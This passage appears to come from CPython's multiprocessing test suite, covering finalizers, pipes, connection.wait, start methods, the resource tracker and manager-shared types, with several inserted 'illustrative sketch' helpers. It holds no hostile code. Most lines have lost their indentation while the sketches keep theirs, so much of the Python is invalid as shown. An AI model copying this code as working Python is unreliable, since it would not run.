class _TestFinalize(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
self.registry_backup = util._finalizer_registry.copy()
util._finalizer_registry.clear()
def tearDown(self):
self.assertFalse(util._finalizer_registry)
util._finalizer_registry.update(self.registry_backup)
@classmethod
def _test_finalize(cls, conn):
class Foo(object):
pass
a = Foo()
util.Finalize(a, conn.send, args=('a',))
del a # triggers callback for a
b = Foo()
close_b = util.Finalize(b, conn.send, args=('b',))
close_b() # triggers callback for b
close_b() # does nothing because callback has already been called
del b # does nothing because callback has already been called
c = Foo()
util.Finalize(c, conn.send, args=('c',))
d10 = Foo()
util.Finalize(d10, conn.send, args=('d10',), exitpriority=1)
d01 = Foo()
util.Finalize(d01, conn.send, args=('d01',), exitpriority=0)
d02 = Foo()
util.Finalize(d02, conn.send, args=('d02',), exitpriority=0)
d03 = Foo()
util.Finalize(d03, conn.send, args=('d03',), exitpriority=0)
util.Finalize(None, conn.send, args=('e',), exitpriority=-10)
util.Finalize(None, conn.send, args=('STOP',), exitpriority=-100)
        # call multiprocessing's cleanup function then exit the process without
        # garbage collecting locals
util._exit_function()
conn.close()
os._exit(0)
def test_finalize(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._test_finalize, args=(child_conn,))
p.daemon = True
p.start()
p.join()
result = [obj for obj in iter(conn.recv, 'STOP')]
self.assertEqual(result, ['a', 'b', 'd10', 'd03', 'd02', 'd01', 'e'])
def test_thread_safety(self):
# bpo-24484: _run_finalizers() should be thread-safe
def cb():
pass
class Foo(object):
def __init__(self):
self.ref = self # create reference cycle
# insert finalizer at random key
util.Finalize(self, cb, exitpriority=random.randint(1, 100))
finish = False
exc = None
def run_finalizers():
nonlocal exc
while not finish:
time.sleep(random.random() * 1e-1)
try:
# A GC run will eventually happen during this,
# collecting stale Foo's and mutating the registry
util._run_finalizers()
except Exception as e:
exc = e
def make_finalizers():
nonlocal exc
d = {}
while not finish:
try:
# Old Foo's get gradually replaced and later
# collected by the GC (because of the cyclic ref)
d[random.getrandbits(5)] = {Foo() for i in range(10)}
except Exception as e:
exc = e
d.clear()
old_interval = sys.getswitchinterval()
old_threshold = gc.get_threshold()
try:
sys.setswitchinterval(1e-6)
gc.set_threshold(5, 5, 5)
threads = [threading.Thread(target=run_finalizers),
threading.Thread(target=make_finalizers)]
with threading_helper.start_threads(threads):
time.sleep(4.0) # Wait a bit to trigger race condition
finish = True
if exc is not None:
raise exc
finally:
sys.setswitchinterval(old_interval)
gc.set_threshold(*old_threshold)
gc.collect() # Collect remaining Foo's
#
# Test that from ... import * works for each module
#
class _TestImportStar(unittest.TestCase):
def get_module_names(self):
import glob
folder = os.path.dirname(multiprocessing.__file__)
pattern = os.path.join(glob.escape(folder), '*.py')
files = glob.glob(pattern)
modules = [os.path.splitext(os.path.split(f)[1])[0] for f in files]
modules = ['multiprocessing.' + m for m in modules]
modules.remove('multiprocessing.__init__')
modules.append('multiprocessing')
return modules
def test_import(self):
modules = self.get_module_names()
if sys.platform == 'win32':
modules.remove('multiprocessing.popen_fork')
modules.remove('multiprocessing.popen_forkserver')
modules.remove('multiprocessing.popen_spawn_posix')
else:
modules.remove('multiprocessing.popen_spawn_win32')
if not HAS_REDUCTION:
modules.remove('multiprocessing.popen_forkserver')
if c_int is None:
# This module requires _ctypes
modules.remove('multiprocessing.sharedctypes')
for name in modules:
__import__(name)
mod = sys.modules[name]
self.assertTrue(hasattr(mod, '__all__'), name)
for attr in mod.__all__:
self.assertTrue(
hasattr(mod, attr),
'%r does not have attribute %r' % (mod, attr)
)
#
# Quick test that logging works -- does not test logging output
#
class _TestLogging(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_enable_logging(self):
logger = multiprocessing.get_logger()
logger.setLevel(util.SUBWARNING)
self.assertTrue(logger is not None)
logger.debug('this will not be printed')
logger.info('nor will this')
logger.setLevel(LOG_LEVEL)
@classmethod
def _test_level(cls, conn):
logger = multiprocessing.get_logger()
conn.send(logger.getEffectiveLevel())
def test_level(self):
LEVEL1 = 32
LEVEL2 = 37
logger = multiprocessing.get_logger()
root_logger = logging.getLogger()
root_level = root_logger.level
reader, writer = multiprocessing.Pipe(duplex=False)
logger.setLevel(LEVEL1)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL1, reader.recv())
p.join()
p.close()
logger.setLevel(logging.NOTSET)
root_logger.setLevel(LEVEL2)
p = self.Process(target=self._test_level, args=(writer,))
p.start()
self.assertEqual(LEVEL2, reader.recv())
p.join()
p.close()
root_logger.setLevel(root_level)
logger.setLevel(level=LOG_LEVEL)
# class _TestLoggingProcessName(BaseTestCase):
#
# def handle(self, record):
# assert record.processName == multiprocessing.current_process().name
# self.__handled = True
#
# def test_logging(self):
# handler = logging.Handler()
# handler.handle = self.handle
# self.__handled = False
# # Bypass getLogger() and side-effects
# logger = logging.getLoggerClass()(
# 'multiprocessing.test.TestLoggingProcessName')
# logger.addHandler(handler)
# logger.propagate = False
#
# logger.warn('foo')
# assert self.__handled
#
# Check that Process.join() retries if os.waitpid() fails with EINTR
#
class _TestPollEintr(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def _killer(cls, pid):
time.sleep(0.1)
os.kill(pid, signal.SIGUSR1)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_poll_eintr(self):
got_signal = [False]
def record(*args):
got_signal[0] = True
pid = os.getpid()
oldhandler = signal.signal(signal.SIGUSR1, record)
try:
killer = self.Process(target=self._killer, args=(pid,))
killer.start()
try:
p = self.Process(target=time.sleep, args=(2,))
p.start()
p.join()
finally:
killer.join()
self.assertTrue(got_signal[0])
self.assertEqual(p.exitcode, 0)
finally:
signal.signal(signal.SIGUSR1, oldhandler)
#
# Test to verify handle verification, see issue 3321
#
class TestInvalidHandle(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_handles(self):
conn = multiprocessing.connection.Connection(44977608)
# check that poll() doesn't crash
try:
conn.poll()
except (ValueError, OSError):
pass
finally:
# Hack private attribute _handle to avoid printing an error
# in conn.__del__
conn._handle = None
self.assertRaises((ValueError, OSError),
multiprocessing.connection.Connection, -1)
@hashlib_helper.requires_hashdigest('md5')
class OtherTest(unittest.TestCase):
# TODO: add more tests for deliver/answer challenge.
def test_deliver_challenge_auth_failure(self):
class _FakeConnection(object):
def recv_bytes(self, size):
return b'something bogus'
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.deliver_challenge,
_FakeConnection(), b'abc')
def test_answer_challenge_auth_failure(self):
class _FakeConnection(object):
def __init__(self):
self.count = 0
def recv_bytes(self, size):
self.count += 1
if self.count == 1:
return multiprocessing.connection.CHALLENGE
elif self.count == 2:
return b'something bogus'
return b''
def send_bytes(self, data):
pass
self.assertRaises(multiprocessing.AuthenticationError,
multiprocessing.connection.answer_challenge,
_FakeConnection(), b'abc')
#
# Test Manager.start()/Pool.__init__() initializer feature - see issue 5585
#
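
#
# Illustrative sketch (not part of the tests): how the initializer/initargs
# feature tested below is used in application code.  Each worker process (or
# the manager's server process) runs ``initializer(*initargs)`` once before
# doing any work.  The helper names and the tag value are hypothetical.
#
_SKETCH_WORKER_TAG = None

def _sketch_init_worker(tag):
    # Runs in the worker process, not in the parent.
    global _SKETCH_WORKER_TAG
    _SKETCH_WORKER_TAG = tag

def _sketch_pool_with_initializer():
    import multiprocessing
    with multiprocessing.Pool(2, _sketch_init_worker, ('worker',)) as pool:
        return pool.map(abs, [-1, 2, -3])
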
def initializer(ns):
ns.test += 1
@hashlib_helper.requires_hashdigest('md5')
class TestInitializers(unittest.TestCase):
def setUp(self):
self.mgr = multiprocessing.Manager()
self.ns = self.mgr.Namespace()
self.ns.test = 0
def tearDown(self):
self.mgr.shutdown()
self.mgr.join()
def test_manager_initializer(self):
m = multiprocessing.managers.SyncManager()
self.assertRaises(TypeError, m.start, 1)
m.start(initializer, (self.ns,))
self.assertEqual(self.ns.test, 1)
m.shutdown()
m.join()
def test_pool_initializer(self):
self.assertRaises(TypeError, multiprocessing.Pool, initializer=1)
p = multiprocessing.Pool(1, initializer, (self.ns,))
p.close()
p.join()
self.assertEqual(self.ns.test, 1)
#
# Issue 5155, 5313, 5331: Test process in processes
# Verifies os.close(sys.stdin.fileno) vs. sys.stdin.close() behavior
#
def _this_sub_process(q):
try:
item = q.get(block=False)
except pyqueue.Empty:
pass
def _test_process():
queue = multiprocessing.Queue()
subProc = multiprocessing.Process(target=_this_sub_process, args=(queue,))
subProc.daemon = True
subProc.start()
subProc.join()
def _afunc(x):
return x*x
def pool_in_process():
pool = multiprocessing.Pool(processes=4)
x = pool.map(_afunc, [1, 2, 3, 4, 5, 6, 7])
pool.close()
pool.join()
class _file_like(object):
def __init__(self, delegate):
self._delegate = delegate
self._pid = None
@property
def cache(self):
pid = os.getpid()
# There are no race conditions since fork keeps only the running thread
if pid != self._pid:
self._pid = pid
self._cache = []
return self._cache
def write(self, data):
self.cache.append(data)
def flush(self):
self._delegate.write(''.join(self.cache))
self._cache = []
class TestStdinBadfiledescriptor(unittest.TestCase):
def test_queue_in_process(self):
proc = multiprocessing.Process(target=_test_process)
proc.start()
proc.join()
def test_pool_in_process(self):
p = multiprocessing.Process(target=pool_in_process)
p.start()
p.join()
def test_flushing(self):
sio = io.StringIO()
flike = _file_like(sio)
flike.write('foo')
proc = multiprocessing.Process(target=lambda: flike.flush())
flike.flush()
assert sio.getvalue() == 'foo'
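
#
# Illustrative sketch (not part of the tests): multiprocessing.connection.wait()
# as exercised by TestWait below.  wait() accepts Connection objects, sockets
# and process sentinels and returns the subset that is ready within the timeout.
#
def _sketch_wait_for_ready_connections():
    import multiprocessing
    from multiprocessing.connection import wait

    r1, w1 = multiprocessing.Pipe(duplex=False)
    r2, w2 = multiprocessing.Pipe(duplex=False)
    try:
        w1.send('ready on pipe 1')
        ready = wait([r1, r2], timeout=1.0)    # only r1 has data, so ready == [r1]
        return [conn.recv() for conn in ready]
    finally:
        for end in (r1, w1, r2, w2):
            end.close()
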
class TestWait(unittest.TestCase):
@classmethod
def _child_test_wait(cls, w, slow):
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
w.send((i, os.getpid()))
w.close()
def test_wait(self, slow=False):
from multiprocessing.connection import wait
readers = []
procs = []
messages = []
for i in range(4):
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._child_test_wait, args=(w, slow))
p.daemon = True
p.start()
w.close()
readers.append(r)
procs.append(p)
self.addCleanup(p.join)
while readers:
for r in wait(readers):
try:
msg = r.recv()
except EOFError:
readers.remove(r)
r.close()
else:
messages.append(msg)
messages.sort()
expected = sorted((i, p.pid) for i in range(10) for p in procs)
self.assertEqual(messages, expected)
@classmethod
def _child_test_wait_socket(cls, address, slow):
s = socket.socket()
s.connect(address)
for i in range(10):
if slow:
time.sleep(random.random()*0.1)
s.sendall(('%s\n' % i).encode('ascii'))
s.close()
def test_wait_socket(self, slow=False):
from multiprocessing.connection import wait
l = socket.create_server((socket_helper.HOST, 0))
addr = l.getsockname()
readers = []
procs = []
dic = {}
for i in range(4):
p = multiprocessing.Process(target=self._child_test_wait_socket,
args=(addr, slow))
p.daemon = True
p.start()
procs.append(p)
self.addCleanup(p.join)
for i in range(4):
r, _ = l.accept()
readers.append(r)
dic[r] = []
l.close()
while readers:
for r in wait(readers):
msg = r.recv(32)
if not msg:
readers.remove(r)
r.close()
else:
dic[r].append(msg)
expected = ''.join('%s\n' % i for i in range(10)).encode('ascii')
for v in dic.values():
self.assertEqual(b''.join(v), expected)
def test_wait_slow(self):
self.test_wait(True)
def test_wait_socket_slow(self):
self.test_wait_socket(True)
def test_wait_timeout(self):
from multiprocessing.connection import wait
expected = 5
a, b = multiprocessing.Pipe()
start = time.monotonic()
res = wait([a, b], expected)
delta = time.monotonic() - start
self.assertEqual(res, [])
self.assertLess(delta, expected * 2)
self.assertGreater(delta, expected * 0.5)
b.send(None)
start = time.monotonic()
res = wait([a, b], 20)
delta = time.monotonic() - start
self.assertEqual(res, [a])
self.assertLess(delta, 0.4)
@classmethod
def signal_and_sleep(cls, sem, period):
sem.release()
time.sleep(period)
def test_wait_integer(self):
from multiprocessing.connection import wait
expected = 3
sorted_ = lambda l: sorted(l, key=lambda x: id(x))
sem = multiprocessing.Semaphore(0)
a, b = multiprocessing.Pipe()
p = multiprocessing.Process(target=self.signal_and_sleep,
args=(sem, expected))
p.start()
self.assertIsInstance(p.sentinel, int)
self.assertTrue(sem.acquire(timeout=20))
start = time.monotonic()
res = wait([a, p.sentinel, b], expected + 20)
delta = time.monotonic() - start
self.assertEqual(res, [p.sentinel])
self.assertLess(delta, expected + 2)
self.assertGreater(delta, expected - 2)
a.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([p.sentinel, b]))
self.assertLess(delta, 0.4)
b.send(None)
start = time.monotonic()
res = wait([a, p.sentinel, b], 20)
delta = time.monotonic() - start
self.assertEqual(sorted_(res), sorted_([a, p.sentinel, b]))
self.assertLess(delta, 0.4)
p.terminate()
p.join()
def test_neg_timeout(self):
from multiprocessing.connection import wait
a, b = multiprocessing.Pipe()
t = time.monotonic()
res = wait([a], timeout=-1)
t = time.monotonic() - t
self.assertEqual(res, [])
self.assertLess(t, 1)
a.close()
b.close()
#
# Issue 14151: Test invalid family on invalid environment
#
class TestInvalidFamily(unittest.TestCase):
@unittest.skipIf(WIN32, "skipped on Windows")
def test_invalid_family(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener(r'\\.\test')
@unittest.skipUnless(WIN32, "skipped on non-Windows platforms")
def test_invalid_family_win32(self):
with self.assertRaises(ValueError):
multiprocessing.connection.Listener('/var/test.pipe')
#
# Issue 12098: check sys.flags of child matches that for parent
#
class TestFlags(unittest.TestCase):
@classmethod
def run_in_grandchild(cls, conn):
conn.send(tuple(sys.flags))
@classmethod
def run_in_child(cls):
import json
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=cls.run_in_grandchild, args=(w,))
p.start()
grandchild_flags = r.recv()
p.join()
r.close()
w.close()
flags = (tuple(sys.flags), grandchild_flags)
print(json.dumps(flags))
def test_flags(self):
import json
# start child process using unusual flags
prog = ('from test._test_multiprocessing import TestFlags; ' +
'TestFlags.run_in_child()')
data = subprocess.check_output(
[sys.executable, '-E', '-S', '-O', '-c', prog])
child_flags, grandchild_flags = json.loads(data.decode('ascii'))
self.assertEqual(child_flags, grandchild_flags)
#
# Test interaction with socket timeouts - see Issue #6056
#
class TestTimeouts(unittest.TestCase):
@classmethod
def _test_timeout(cls, child, address):
time.sleep(1)
child.send(123)
child.close()
conn = multiprocessing.connection.Client(address)
conn.send(456)
conn.close()
def test_timeout(self):
old_timeout = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(0.1)
parent, child = multiprocessing.Pipe(duplex=True)
l = multiprocessing.connection.Listener(family='AF_INET')
p = multiprocessing.Process(target=self._test_timeout,
args=(child, l.address))
p.start()
child.close()
self.assertEqual(parent.recv(), 123)
parent.close()
conn = l.accept()
self.assertEqual(conn.recv(), 456)
conn.close()
l.close()
join_process(p)
finally:
socket.setdefaulttimeout(old_timeout)
#
# Test what happens with no "if __name__ == '__main__'"
#
class TestNoForkBomb(unittest.TestCase):
def test_noforkbomb(self):
sm = multiprocessing.get_start_method()
name = os.path.join(os.path.dirname(__file__), 'mp_fork_bomb.py')
if sm != 'fork':
rc, out, err = test.support.script_helper.assert_python_failure(name, sm)
self.assertEqual(out, b'')
self.assertIn(b'RuntimeError', err)
else:
rc, out, err = test.support.script_helper.assert_python_ok(name, sm)
self.assertEqual(out.rstrip(), b'123')
self.assertEqual(err, b'')
#
# Issue #17555: ForkAwareThreadLock
#
class TestForkAwareThreadLock(unittest.TestCase):
    # We recursively start processes. Issue #17555 meant that the
    # after-fork registry would get duplicate entries for the same
    # lock. The size of the registry at generation n was ~2**n.
@classmethod
def child(cls, n, conn):
if n > 1:
p = multiprocessing.Process(target=cls.child, args=(n-1, conn))
p.start()
conn.close()
join_process(p)
else:
conn.send(len(util._afterfork_registry))
conn.close()
def test_lock(self):
r, w = multiprocessing.Pipe(False)
l = util.ForkAwareThreadLock()
old_size = len(util._afterfork_registry)
p = multiprocessing.Process(target=self.child, args=(5, w))
p.start()
w.close()
new_size = r.recv()
join_process(p)
self.assertLessEqual(new_size, old_size)
#
# Check that non-forked child processes do not inherit unneeded fds/handles
#
class TestCloseFds(unittest.TestCase):
def get_high_socket_fd(self):
if WIN32:
# The child process will not have any socket handles, so
# calling socket.fromfd() should produce WSAENOTSOCK even
# if there is a handle of the same number.
return socket.socket().detach()
else:
# We want to produce a socket with an fd high enough that a
# freshly created child process will not have any fds as high.
fd = socket.socket().detach()
to_close = []
while fd < 50:
to_close.append(fd)
fd = os.dup(fd)
for x in to_close:
os.close(x)
return fd
def close(self, fd):
if WIN32:
socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=fd).close()
else:
os.close(fd)
@classmethod
def _test_closefds(cls, conn, fd):
try:
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
except Exception as e:
conn.send(e)
else:
s.close()
conn.send(None)
def test_closefd(self):
if not HAS_REDUCTION:
raise unittest.SkipTest('requires fd pickling')
reader, writer = multiprocessing.Pipe()
fd = self.get_high_socket_fd()
try:
p = multiprocessing.Process(target=self._test_closefds,
args=(writer, fd))
p.start()
writer.close()
e = reader.recv()
join_process(p)
finally:
self.close(fd)
writer.close()
reader.close()
if multiprocessing.get_start_method() == 'fork':
self.assertIs(e, None)
else:
WSAENOTSOCK = 10038
self.assertIsInstance(e, OSError)
self.assertTrue(e.errno == errno.EBADF or
e.winerror == WSAENOTSOCK, e)
#
# Issue #17097: EINTR should be ignored by recv(), send(), accept() etc
#
class TestIgnoreEINTR(unittest.TestCase):
# Sending CONN_MAX_SIZE bytes into a multiprocessing pipe must block
CONN_MAX_SIZE = max(support.PIPE_MAX_SIZE, support.SOCK_MAX_SIZE)
@classmethod
def _test_ignore(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
conn.send('ready')
x = conn.recv()
conn.send(x)
conn.send_bytes(b'x' * cls.CONN_MAX_SIZE)
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
self.assertEqual(conn.recv(), 'ready')
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
conn.send(1234)
self.assertEqual(conn.recv(), 1234)
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
self.assertEqual(conn.recv_bytes(), b'x' * self.CONN_MAX_SIZE)
time.sleep(0.1)
p.join()
finally:
conn.close()
@classmethod
def _test_ignore_listener(cls, conn):
def handler(signum, frame):
pass
signal.signal(signal.SIGUSR1, handler)
with multiprocessing.connection.Listener() as l:
conn.send(l.address)
a = l.accept()
a.send('welcome')
@unittest.skipUnless(hasattr(signal, 'SIGUSR1'), 'requires SIGUSR1')
def test_ignore_listener(self):
conn, child_conn = multiprocessing.Pipe()
try:
p = multiprocessing.Process(target=self._test_ignore_listener,
args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
address = conn.recv()
time.sleep(0.1)
os.kill(p.pid, signal.SIGUSR1)
time.sleep(0.1)
client = multiprocessing.connection.Client(address)
self.assertEqual(client.recv(), 'welcome')
p.join()
finally:
conn.close()
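
#
# Illustrative sketch (not part of the tests): start methods and contexts as
# exercised by TestStartMethod below.  A context object behaves like the
# multiprocessing module itself but with the start method fixed.
#
def _sketch_report_start_method(conn):
    # Child side of the sketch below: report which start method created us.
    import multiprocessing
    conn.send(multiprocessing.get_start_method())
    conn.close()

def _sketch_start_method_context():
    import multiprocessing

    methods = multiprocessing.get_all_start_methods()   # e.g. ['fork', 'spawn', ...]
    ctx = multiprocessing.get_context(methods[0])       # any supported method
    r, w = ctx.Pipe(duplex=False)
    p = ctx.Process(target=_sketch_report_start_method, args=(w,))
    p.start()
    w.close()
    child_method = r.recv()      # matches ctx.get_start_method()
    p.join()
    r.close()
    return child_method
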
class TestStartMethod(unittest.TestCase):
@classmethod
def _check_context(cls, conn):
conn.send(multiprocessing.get_start_method())
def check_context(self, ctx):
r, w = ctx.Pipe(duplex=False)
p = ctx.Process(target=self._check_context, args=(w,))
p.start()
w.close()
child_method = r.recv()
r.close()
p.join()
self.assertEqual(child_method, ctx.get_start_method())
def test_context(self):
for method in ('fork', 'spawn', 'forkserver'):
try:
ctx = multiprocessing.get_context(method)
except ValueError:
continue
self.assertEqual(ctx.get_start_method(), method)
self.assertIs(ctx.get_context(), ctx)
self.assertRaises(ValueError, ctx.set_start_method, 'spawn')
self.assertRaises(ValueError, ctx.set_start_method, None)
self.check_context(ctx)
def test_set_get(self):
multiprocessing.set_forkserver_preload(PRELOAD)
count = 0
old_method = multiprocessing.get_start_method()
try:
for method in ('fork', 'spawn', 'forkserver'):
try:
multiprocessing.set_start_method(method, force=True)
except ValueError:
continue
self.assertEqual(multiprocessing.get_start_method(), method)
ctx = multiprocessing.get_context()
self.assertEqual(ctx.get_start_method(), method)
self.assertTrue(type(ctx).__name__.lower().startswith(method))
self.assertTrue(
ctx.Process.__name__.lower().startswith(method))
self.check_context(multiprocessing)
count += 1
finally:
multiprocessing.set_start_method(old_method, force=True)
self.assertGreaterEqual(count, 1)
def test_get_all(self):
methods = multiprocessing.get_all_start_methods()
if sys.platform == 'win32':
self.assertEqual(methods, ['spawn'])
else:
self.assertTrue(methods == ['fork', 'spawn'] or
methods == ['spawn', 'fork'] or
methods == ['fork', 'spawn', 'forkserver'] or
methods == ['spawn', 'fork', 'forkserver'])
def test_preload_resources(self):
if multiprocessing.get_start_method() != 'forkserver':
self.skipTest("test only relevant for 'forkserver' method")
name = os.path.join(os.path.dirname(__file__), 'mp_preload.py')
rc, out, err = test.support.script_helper.assert_python_ok(name)
out = out.decode()
err = err.decode()
if out.rstrip() != 'ok' or err != '':
print(out)
print(err)
self.fail("failed spawning forkserver or grandchild")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
class TestResourceTracker(unittest.TestCase):
def test_resource_tracker(self):
        #
        # Check that killing a process does not leak named semaphores
        #
cmd = '''if 1:
import time, os, tempfile
import multiprocessing as mp
from multiprocessing import resource_tracker
from multiprocessing.shared_memory import SharedMemory
mp.set_start_method("spawn")
rand = tempfile._RandomNameSequence()
def create_and_register_resource(rtype):
if rtype == "semaphore":
lock = mp.Lock()
return lock, lock._semlock.name
elif rtype == "shared_memory":
sm = SharedMemory(create=True, size=10)
return sm, sm._name
else:
raise ValueError(
"Resource type {{}} not understood".format(rtype))
resource1, rname1 = create_and_register_resource("{rtype}")
resource2, rname2 = create_and_register_resource("{rtype}")
os.write({w}, rname1.encode("ascii") + b"\\n")
os.write({w}, rname2.encode("ascii") + b"\\n")
time.sleep(10)
'''
for rtype in resource_tracker._CLEANUP_FUNCS:
with self.subTest(rtype=rtype):
if rtype == "noop":
# Artefact resource type used by the resource_tracker
continue
r, w = os.pipe()
p = subprocess.Popen([sys.executable,
'-E', '-c', cmd.format(w=w, rtype=rtype)],
pass_fds=[w],
stderr=subprocess.PIPE)
os.close(w)
with open(r, 'rb', closefd=True) as f:
name1 = f.readline().rstrip().decode('ascii')
name2 = f.readline().rstrip().decode('ascii')
_resource_unlink(name1, rtype)
p.terminate()
p.wait()
deadline = time.monotonic() + support.LONG_TIMEOUT
while time.monotonic() < deadline:
time.sleep(.5)
try:
_resource_unlink(name2, rtype)
except OSError as e:
# docs say it should be ENOENT, but OSX seems to give
# EINVAL
self.assertIn(e.errno, (errno.ENOENT, errno.EINVAL))
break
else:
raise AssertionError(
f"A {rtype} resource was leaked after a process was "
f"abruptly terminated.")
err = p.stderr.read().decode('utf-8')
p.stderr.close()
expected = ('resource_tracker: There appear to be 2 leaked {} '
'objects'.format(
rtype))
self.assertRegex(err, expected)
self.assertRegex(err, r'resource_tracker: %r: \[Errno' % name1)
def check_resource_tracker_death(self, signum, should_die):
# bpo-31310: if the semaphore tracker process has died, it should
# be restarted implicitly.
from multiprocessing.resource_tracker import _resource_tracker
pid = _resource_tracker._pid
if pid is not None:
os.kill(pid, signal.SIGKILL)
support.wait_process(pid, exitcode=-signal.SIGKILL)
with warnings.catch_warnings():
warnings.simplefilter("ignore")
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
os.kill(pid, signum)
time.sleep(1.0) # give it time to die
ctx = multiprocessing.get_context("spawn")
with warnings.catch_warnings(record=True) as all_warn:
warnings.simplefilter("always")
sem = ctx.Semaphore()
sem.acquire()
sem.release()
wr = weakref.ref(sem)
# ensure `sem` gets collected, which triggers communication with
# the semaphore tracker
del sem
gc.collect()
self.assertIsNone(wr())
if should_die:
self.assertEqual(len(all_warn), 1)
the_warn = all_warn[0]
self.assertTrue(issubclass(the_warn.category, UserWarning))
self.assertTrue("resource_tracker: process died"
in str(the_warn.message))
else:
self.assertEqual(len(all_warn), 0)
def test_resource_tracker_sigint(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGINT, False)
def test_resource_tracker_sigterm(self):
# Catchable signal (ignored by semaphore tracker)
self.check_resource_tracker_death(signal.SIGTERM, False)
def test_resource_tracker_sigkill(self):
# Uncatchable signal.
self.check_resource_tracker_death(signal.SIGKILL, True)
@staticmethod
def _is_resource_tracker_reused(conn, pid):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
        # The pid should be None in the child process, except for the fork
        # context. It should not be a new value.
reused = _resource_tracker._pid in (None, pid)
reused &= _resource_tracker._check_alive()
conn.send(reused)
def test_resource_tracker_reused(self):
from multiprocessing.resource_tracker import _resource_tracker
_resource_tracker.ensure_running()
pid = _resource_tracker._pid
r, w = multiprocessing.Pipe(duplex=False)
p = multiprocessing.Process(target=self._is_resource_tracker_reused,
args=(w, pid))
p.start()
is_resource_tracker_reused = r.recv()
# Clean up
p.join()
w.close()
r.close()
self.assertTrue(is_resource_tracker_reused)
class TestSimpleQueue(unittest.TestCase):
@classmethod
def _test_empty(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
# issue 30301, could fail under spawn and forkserver
try:
queue.put(queue.empty())
queue.put(queue.empty())
finally:
parent_can_continue.set()
def test_empty(self):
queue = multiprocessing.SimpleQueue()
child_can_start = multiprocessing.Event()
parent_can_continue = multiprocessing.Event()
proc = multiprocessing.Process(
target=self._test_empty,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertTrue(queue.empty())
child_can_start.set()
parent_can_continue.wait()
self.assertFalse(queue.empty())
self.assertEqual(queue.get(), True)
self.assertEqual(queue.get(), False)
self.assertTrue(queue.empty())
proc.join()
def test_close(self):
queue = multiprocessing.SimpleQueue()
queue.close()
# closing a queue twice should not fail
queue.close()
# Test specific to CPython since it tests private attributes
@test.support.cpython_only
def test_closed(self):
queue = multiprocessing.SimpleQueue()
queue.close()
self.assertTrue(queue._reader.closed)
self.assertTrue(queue._writer.closed)
class TestPoolNotLeakOnFailure(unittest.TestCase):
def test_release_unused_processes(self):
# Issue #19675: During pool creation, if we can't create a process,
# don't leak already created ones.
will_fail_in = 3
forked_processes = []
class FailingForkProcess:
def __init__(self, **kwargs):
self.name = 'Fake Process'
self.exitcode = None
self.state = None
forked_processes.append(self)
def start(self):
nonlocal will_fail_in
if will_fail_in <= 0:
raise OSError("Manually induced OSError")
will_fail_in -= 1
self.state = 'started'
def terminate(self):
self.state = 'stopping'
def join(self):
if self.state == 'stopping':
self.state = 'stopped'
def is_alive(self):
return self.state == 'started' or self.state == 'stopping'
with self.assertRaisesRegex(OSError, 'Manually induced OSError'):
p = multiprocessing.pool.Pool(5, context=unittest.mock.MagicMock(
Process=FailingForkProcess))
p.close()
p.join()
self.assertFalse(
any(process.is_alive() for process in forked_processes))
@hashlib_helper.requires_hashdigest('md5')
class TestSyncManagerTypes(unittest.TestCase):
"""Test all the types which can be shared between a parent and a
child process by using a manager which acts as an intermediary
between them.
In the following unit-tests the base type is created in the parent
process, the @classmethod represents the worker process and the
shared object is readable and editable between the two.
# The child.
@classmethod
def _test_list(cls, obj):
assert obj[0] == 5
assert obj.append(6)
# The parent.
def test_list(self):
o = self.manager.list()
o.append(5)
self.run_worker(self._test_list, o)
assert o[1] == 6
"""
manager_class = multiprocessing.managers.SyncManager
def setUp(self):
self.manager = self.manager_class()
self.manager.start()
self.proc = None
def tearDown(self):
if self.proc is not None and self.proc.is_alive():
self.proc.terminate()
self.proc.join()
self.manager.shutdown()
self.manager = None
self.proc = None
@classmethod
def setUpClass(cls):
support.reap_children()
tearDownClass = setUpClass
def wait_proc_exit(self):
# Only the manager process should be returned by active_children()
# but this can take a bit on slow machines, so wait a few seconds
# if there are other children too (see #17395).
join_process(self.proc)
start_time = time.monotonic()
t = 0.01
while len(multiprocessing.active_children()) > 1:
time.sleep(t)
t *= 2
dt = time.monotonic() - start_time
if dt >= 5.0:
test.support.environment_altered = True
support.print_warning(f"multiprocessing.Manager still has "
f"{multiprocessing.active_children()} "
f"active children after {dt} seconds")
break
def run_worker(self, worker, obj):
self.proc = multiprocessing.Process(target=worker, args=(obj, ))
self.proc.daemon = True
self.proc.start()
self.wait_proc_exit()
self.assertEqual(self.proc.exitcode, 0)
@classmethod
def _test_event(cls, obj):
assert obj.is_set()
obj.wait()
obj.clear()
obj.wait(0.001)
def test_event(self):
o = self.manager.Event()
o.set()
self.run_worker(self._test_event, o)
assert not o.is_set()
